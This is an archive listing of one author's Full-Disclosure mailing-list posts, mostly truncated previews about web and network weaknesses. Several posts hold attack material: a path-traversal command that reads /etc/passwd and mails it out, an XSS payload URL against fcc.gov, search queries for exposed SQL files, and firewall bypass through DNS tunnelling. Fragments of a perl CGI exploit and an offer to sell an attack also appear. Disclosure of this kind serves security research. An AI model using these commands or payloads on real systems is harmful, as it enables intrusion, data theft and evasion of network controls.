[Full-disclosure] Sex links fail

2014-01-13 Thread Marshall Whittaker
links xxx.xx.xxx/../../../../../../etc/passwd -dump|mail -s HOPE userz full-disclosure@lists.grok.org.uk ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by

[Full-disclosure] Google Numbers Search

2012-10-22 Thread Marshall Whittaker
So... Google really does let you search for any number... http://www.google.com/#q=1..9+filetype:sql :( http://www.google.com/#q=10e7..10e8+filetype:sql :)

[Full-disclosure] Google Blacklisted Database Query

2012-07-27 Thread Marshall Whittaker
Google has totally 'blacklisted' queries. For example, if you search for 4000..4999 (any 16 digit number starting with 4), as well as some other little known strings, you will instantly get an error message from Google talking about bad traffic from your network (it looks

[Full-disclosure] Disclosures on YouTube (Onaquad Systems Security)

2011-10-17 Thread Marshall Whittaker
List, I'll now be putting up my disclosures on YouTube a day or two before on full-disclosure. You can visit them here: http://www.youtube.com/user/onaquad under the title Onaquad Security. Hope you enjoy! I'll probably start posting the src of the code I use there here too. There is already

[Full-disclosure] perl pipe shell exploit

2011-10-15 Thread Marshall Whittaker
This works off the perl pipe read bug, you can just input the first and second parts of the web address (with http:// included) and it'll drop you at a shell. When using cd you must use the absolute path because I was too lazy to do it the correct way. ;-). I know this is pretty easy stuff, it

[Full-disclosure] perl pipe exploit (drops you at a shell)

2011-10-15 Thread Marshall Whittaker
This works off the perl pipe read bug, you can just input the first and second parts of the web address (with http:// included) and it'll drop you at a shell. When using cd you must use the absolute path because I was too lazy to do it the correct way. ;-). I know this is pretty easy stuff, it

Re: [Full-disclosure] perl pipe exploit (drops you at a shell)

2011-10-15 Thread Marshall Whittaker
Well shit. It did send twice. :( Now I look like a goof, haha. On Sat, Oct 15, 2011 at 6:58 PM, Marshall Whittaker marshallwhitta...@gmail.com wrote: This works off the perl pipe read bug, you can just input the first and second parts of the web address (with http:// included) and it'll

[Full-disclosure] Verizon Wireless DNS Tunneling

2011-10-07 Thread Marshall Whittaker
I recently noticed that you can tunnel TCP through DNS (I used iodine) to penetrate Verizon Wireless' firewall. You can connect, and if you can hold the connection long enough to make a DNS tunnel, then the connection stays up, then use SSH -D to create a proxy server for your traffic. Bottom

Re: [Full-disclosure] Verizon Wireless DNS Tunneling

2011-10-07 Thread Marshall Whittaker
with, and abused so infrequently, that it's left alone. On Fri, Oct 7, 2011 at 3:32 AM, Marshall Whittaker marshallwhitta...@gmail.com wrote: I recently noticed that you can tunnel TCP through DNS (I used iodine) to penetrate Verizon Wireless' firewall. You can connect, and if you can hold

Re: [Full-disclosure] Verizon Wireless DNS Tunneling

2011-10-07 Thread Marshall Whittaker
not (well, it MIGHT take us somewhere good). It's not like there's a magic off switch that makes this go away. On Fri, Oct 7, 2011 at 4:56 AM, Marshall Whittaker marshallwhitta...@gmail.com wrote: Yes, I've found that DNS tunneling works well at the college I go to on their WIFI. I've never

[Full-disclosure] New attack vector for sale, firewall bypass

2011-06-07 Thread Marshall Whittaker
Hello, I am willing to sell a new attack vector I have devised. The proof of concept code you will receive has the ability to arbitrarily upload files to a webserver (tested on Apache), running linux with the well known perl read pipe vulnerability in many web CGI applications. This issue can

Re: [Full-disclosure] New attack vector for sale, firewall bypass

2011-06-07 Thread Marshall Whittaker
, Marshall Whittaker marshallwhitta...@gmail.com wrote: Hello, I am willing to sell a new attack vector I have devised. The proof of concept code you will receive has the ability to arbitrarily upload files to a webserver (tested on Apache), running linux with the well known perl read

[Full-disclosure] iOffice 0.1 command execution vulnerability

2010-07-16 Thread Marshall Whittaker
iOffice 0.1 is vulnerable because it does not sanitize user input. It seems to be modular because none of the scripts are exactly the same on ones I've run across, but they all seem to be vulnerable. Command execution is possible.

[Full-disclosure] Google auto redirect

2010-07-13 Thread Marshall Whittaker
I don't really consider this a vulnerability, but it's funny. http://www.google.com/search?q=%79%61%68%6F%6Fie=ISO-8859-1source=hphl=enbtnI=I%26%2339;%69%6D%2B%46%65%65%6C%69%6E%67%2B%4C%75%63%6B%79 -- oxagast

Re: [Full-disclosure] (Almost) Universal perl CGI exploitation

2010-06-21 Thread Marshall Whittaker
); unlink(getfile.sh); $exploitable = 1; } } } system(rm gettmp getfile.sh); } if ($exploitable == 0) { print Sorry, not exploitable...\n; } --- code --- On Sun, Jun 20, 2010 at 11:43 PM, Marshall Whittaker

[Full-disclosure] (Almost) Universal perl CGI exploitation

2010-06-20 Thread Marshall Whittaker
This works on the perl pipe bug. It'll take an arg that's the address of a website and its cgi script with some args to the script then figure out if it can exploit it and how. It's worked on everything I've tried it on, though I have limited test boxes. It's pretty dirty but it works.

[Full-disclosure] fcc.gov XSS

2010-05-24 Thread Marshall Whittaker
FCC.gov XSS --- CODE --- http://fjallfoss.fcc.gov/cgi-bin/ws.exe/prod/cdbs/pubacc/prod/leg_det.pl?Application_id=1186791File_number=%3Cscript%20language=%22javascript%22%20type=%22text/javascript%22%3Ealert('h4x0r3d');%3C/script%3E --- CODE --- --oxagast